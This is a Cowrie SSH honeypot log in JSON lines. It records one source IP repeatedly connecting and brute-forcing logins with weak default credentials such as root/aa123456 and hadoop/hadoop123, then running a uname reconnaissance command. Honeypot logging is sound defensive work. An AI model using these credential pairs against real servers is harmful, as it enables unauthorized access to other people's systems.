{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:22:40.288400Z","src_ip":"217.154.1.158","session":"272685f71a04"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-26T20:22:40.332934Z","src_ip":"217.154.1.158","session":"272685f71a04"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:22:41.349231Z","src_ip":"217.154.1.158","session":"272685f71a04"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":36386,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cb08205c431","protocol":"ssh","message":"New connection: 217.154.1.158:36386 (1.2.3.4:22) [session: 8cb08205c431]","sensor":"my-vps","timestamp":"2025-08-26T20:22:57.205597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:22:57.206536Z","src_ip":"217.154.1.158","session":"8cb08205c431"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:22:57.221043Z","src_ip":"217.154.1.158","session":"8cb08205c431"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:22:57.267055Z","src_ip":"217.154.1.158","session":"8cb08205c431"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:22:57.362898Z","src_ip":"217.154.1.158","session":"8cb08205c431"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:22:57.363566Z","src_ip":"217.154.1.158","session":"8cb08205c431"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:22:57.378899Z","src_ip":"217.154.1.158","session":"8cb08205c431"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:22:57.380119Z","src_ip":"217.154.1.158","session":"8cb08205c431"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":58398,"dst_ip":"1.2.3.4","dst_port":22,"session":"66a8a89ae4e4","protocol":"ssh","message":"New connection: 217.154.1.158:58398 (1.2.3.4:22) [session: 66a8a89ae4e4]","sensor":"my-vps","timestamp":"2025-08-26T20:23:14.473548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:23:14.474237Z","src_ip":"217.154.1.158","session":"66a8a89ae4e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:23:14.488894Z","src_ip":"217.154.1.158","session":"66a8a89ae4e4"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:23:14.532693Z","src_ip":"217.154.1.158","session":"66a8a89ae4e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:23:14.577633Z","src_ip":"217.154.1.158","session":"66a8a89ae4e4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:23:14.578310Z","src_ip":"217.154.1.158","session":"66a8a89ae4e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:23:14.594684Z","src_ip":"217.154.1.158","session":"66a8a89ae4e4"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:23:14.595635Z","src_ip":"217.154.1.158","session":"66a8a89ae4e4"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51010,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b32fb499a05","protocol":"ssh","message":"New connection: 217.154.1.158:51010 (1.2.3.4:22) [session: 1b32fb499a05]","sensor":"my-vps","timestamp":"2025-08-26T20:23:31.566912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:23:31.568638Z","src_ip":"217.154.1.158","session":"1b32fb499a05"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:23:31.583487Z","src_ip":"217.154.1.158","session":"1b32fb499a05"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:23:31.629473Z","src_ip":"217.154.1.158","session":"1b32fb499a05"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:23:31.722391Z","src_ip":"217.154.1.158","session":"1b32fb499a05"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:23:31.723136Z","src_ip":"217.154.1.158","session":"1b32fb499a05"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:23:31.738732Z","src_ip":"217.154.1.158","session":"1b32fb499a05"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:23:31.739688Z","src_ip":"217.154.1.158","session":"1b32fb499a05"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43388,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e2f1fce494c","protocol":"ssh","message":"New connection: 217.154.1.158:43388 (1.2.3.4:22) [session: 2e2f1fce494c]","sensor":"my-vps","timestamp":"2025-08-26T20:23:48.579639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:23:48.580302Z","src_ip":"217.154.1.158","session":"2e2f1fce494c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:23:48.594922Z","src_ip":"217.154.1.158","session":"2e2f1fce494c"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:23:48.641405Z","src_ip":"217.154.1.158","session":"2e2f1fce494c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:23:48.747418Z","src_ip":"217.154.1.158","session":"2e2f1fce494c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:23:48.748124Z","src_ip":"217.154.1.158","session":"2e2f1fce494c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:23:48.763384Z","src_ip":"217.154.1.158","session":"2e2f1fce494c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:23:48.764637Z","src_ip":"217.154.1.158","session":"2e2f1fce494c"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":53104,"dst_ip":"1.2.3.4","dst_port":22,"session":"e07dae4609b6","protocol":"ssh","message":"New connection: 217.154.1.158:53104 (1.2.3.4:22) [session: e07dae4609b6]","sensor":"my-vps","timestamp":"2025-08-26T20:24:06.077503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:24:06.078508Z","src_ip":"217.154.1.158","session":"e07dae4609b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:24:06.092903Z","src_ip":"217.154.1.158","session":"e07dae4609b6"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:24:06.137872Z","src_ip":"217.154.1.158","session":"e07dae4609b6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:24:07.154826Z","src_ip":"217.154.1.158","session":"e07dae4609b6"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43126,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac5adaf2646b","protocol":"ssh","message":"New connection: 217.154.1.158:43126 (1.2.3.4:22) [session: ac5adaf2646b]","sensor":"my-vps","timestamp":"2025-08-26T20:24:23.123602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:24:23.125790Z","src_ip":"217.154.1.158","session":"ac5adaf2646b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:24:23.138753Z","src_ip":"217.154.1.158","session":"ac5adaf2646b"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:24:23.206779Z","src_ip":"217.154.1.158","session":"ac5adaf2646b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:24:24.227437Z","src_ip":"217.154.1.158","session":"ac5adaf2646b"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51788,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a35c25f3b13","protocol":"ssh","message":"New connection: 217.154.1.158:51788 (1.2.3.4:22) [session: 7a35c25f3b13]","sensor":"my-vps","timestamp":"2025-08-26T20:24:40.212231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:24:40.212977Z","src_ip":"217.154.1.158","session":"7a35c25f3b13"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:24:40.227707Z","src_ip":"217.154.1.158","session":"7a35c25f3b13"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:24:40.272393Z","src_ip":"217.154.1.158","session":"7a35c25f3b13"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:24:40.319015Z","src_ip":"217.154.1.158","session":"7a35c25f3b13"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:24:40.319739Z","src_ip":"217.154.1.158","session":"7a35c25f3b13"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:24:40.335051Z","src_ip":"217.154.1.158","session":"7a35c25f3b13"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:24:40.335980Z","src_ip":"217.154.1.158","session":"7a35c25f3b13"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":50542,"dst_ip":"1.2.3.4","dst_port":22,"session":"2acc9ee72205","protocol":"ssh","message":"New connection: 217.154.1.158:50542 (1.2.3.4:22) [session: 2acc9ee72205]","sensor":"my-vps","timestamp":"2025-08-26T20:24:57.384890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:24:57.385664Z","src_ip":"217.154.1.158","session":"2acc9ee72205"}
